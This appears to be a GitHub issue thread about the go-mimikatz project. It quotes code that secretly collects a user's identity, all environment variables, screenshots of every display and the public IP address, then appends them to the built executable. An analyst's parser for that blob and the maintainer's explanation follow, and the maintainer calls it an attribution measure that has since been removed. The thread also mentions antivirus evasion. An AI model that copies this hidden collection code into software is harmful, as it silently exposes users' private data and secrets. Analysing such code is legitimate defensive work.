go-mimikatz
Why write personal information to out.exe?
```go
// The quoted project code: everything written to pkg is appended to out.exe.
thisUser, err := user.Current()
checkErr(err)
pkg := bytes.NewBuffer([]byte{})
pkg.WriteString("|*****|") // marker that starts the appended data
pkg.WriteString(thisUser.HomeDir) // home directory
pkg.WriteString("|||")
pkg.WriteString(thisUser.Username) // account name
pkg.WriteString("|||")
pkg.WriteString(thisUser.Name) // full name
for _, enVar := range os.Environ() { // every environment variable
	pkg.WriteString(enVar)
	pkg.WriteString("|")
}
for index := 0; index < screenshot.NumActiveDisplays(); index++ { // a screenshot of every display
	img, err := screenshot.CaptureRect(screenshot.GetDisplayBounds(index))
	checkErr(err)
	png.Encode(pkg, img)
	pkg.WriteString("|||")
}
resp, err := http.Get("https://myexternalip.com/raw") // public IP from an external service
checkErr(err)
defer resp.Body.Close()
ip, err := ioutil.ReadAll(resp.Body)
checkErr(err)
pkg.Write(ip)
pkg.WriteString("|||")
pkg.WriteString(runtime.GOARCH) // CPU architecture
pkg.WriteString("|||")
pkg.WriteString(runtime.GOOS) // operating system
```
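For an analyst who wants to see what a dropped binary carries about its host, here is an added example (not code from the go-mimikatz project or from anyone in this thread): a Go parser for a blob laid out exactly as the quoted snippet writes it. It assumes the appended data is still in this plaintext layout, and the home directory, user names, environment variables and IP address in the sample are constructed.

```go
package main

import (
	"bytes"
	"fmt"
	"image"
	"image/png"
	"strings"
)
const marker, sep = "|*****|", "|||" // delimiters copied from the quoted snippet
var pngSig = []byte("\x89PNG\r\n\x1a\n")
// Parse splits a plaintext overlay blob into its text fields (HomeDir, Username, Name+env,
// IP, GOARCH, GOOS) and screenshots; Name and env come back glued because the snippet writes no "|||" between them.
func Parse(blob []byte) (fields []string, shots [][]byte, err error) {
	i := bytes.Index(blob, []byte(marker))
	if i < 0 {
		return nil, nil, fmt.Errorf("marker %q not found", marker)
	}
	rest := blob[i+len(marker):]
	if j := bytes.Index(rest, pngSig); j >= 0 { // the text header ends where the first PNG begins
		fields, rest = strings.SplitN(string(rest[:j]), sep, 3), rest[j:]
	}
	for bytes.HasPrefix(rest, pngSig) {
		r := bytes.NewReader(rest) // the standard decoder consumes exactly one image, so "|" bytes in pixel data never split a field
		if _, err = png.Decode(r); err != nil {
			return nil, nil, err
		}
		n := len(rest) - r.Len()
		shots, rest = append(shots, rest[:n]), bytes.TrimPrefix(rest[n:], []byte(sep))
	}
	if fields = append(fields, strings.Split(string(rest), sep)...); len(fields) != 6 {
		return nil, nil, fmt.Errorf("expected 6 text fields, got %d", len(fields))
	}
	return fields, shots, nil
}
// sampleBlob mirrors the snippet's writes with constructed values (not real data).
func sampleBlob() []byte {
	var b bytes.Buffer
	b.WriteString(marker + `C:\Users\alice` + sep + "alice" + sep + "Alice" + "PATH=C:\\bin|TEMP=C:\\tmp|")
	for _, w := range []int{1, 2} { // two "displays"
		png.Encode(&b, image.NewRGBA(image.Rect(0, 0, w, w)))
		b.WriteString(sep)
	}
	b.WriteString("203.0.113.7" + sep + "amd64" + sep + "windows")
	return b.Bytes()
}
func main() {
	fields, shots, err := Parse(sampleBlob())
	fmt.Println(fields, len(shots), err)
}
```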
影舞者 大佬, this is the overlay technique for statically evading Defender and 360. Although I also think the information collected is a bit too private, the data is not sent anywhere and it gets encrypted.
Having since looked at the earlier readme, someone used this tool for ransomware, so I guess it was put there for attribution.
This code is now removed; I put it there as a silent operation, and the operation has now concluded :)